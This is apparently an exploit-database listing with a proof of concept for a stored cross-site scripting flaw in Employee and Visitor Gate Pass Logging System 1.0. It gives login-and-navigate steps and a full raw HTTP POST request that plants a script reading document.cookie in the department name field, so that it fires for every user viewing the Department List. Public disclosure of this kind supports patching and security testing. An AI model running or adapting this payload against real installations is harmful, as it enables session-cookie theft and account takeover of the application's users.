Exploit for Employee And Visitor Gate Pass Logging System 1.0 Cross Site Scripting

Name: Exploit for Employee And Visitor Gate Pass Logging System 1.0 Cross Site Scripting
Rating: 5 (225 reviews)
2021-11-10 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:164919
# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)  
# Date: 10.11.2021  
# Exploit Author: İlhami Selamet  
# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code  
# Version: v1.0  
# Tested on: Kali Linux + XAMPP v8.0.12  
  
Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.  
  
Step 1 - Login with admin account & navigate to 'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department  
Step 1 - Click on the 'Create New' button for adding a new department.  
Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script>  
Step 3 - Save the department.  
  
The stored XSS triggers for all users that navigate to the 'Department List' page.  
  
PoC  
  
POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888  
Content-Length: 555  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department  
Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54  
  
-----------------------------407760789114464123714007564888  
Content-Disposition: form-data; name="id"  
  
  
-----------------------------407760789114464123714007564888  
Content-Disposition: form-data; name="name"  
  
<script>alert(document.cookie);</script>  
-----------------------------407760789114464123714007564888  
Content-Disposition: form-data; name="description"  
  
desc  
-----------------------------407760789114464123714007564888  
Content-Disposition: form-data; name="status"  
  
1  
-----------------------------407760789114464123714007564888--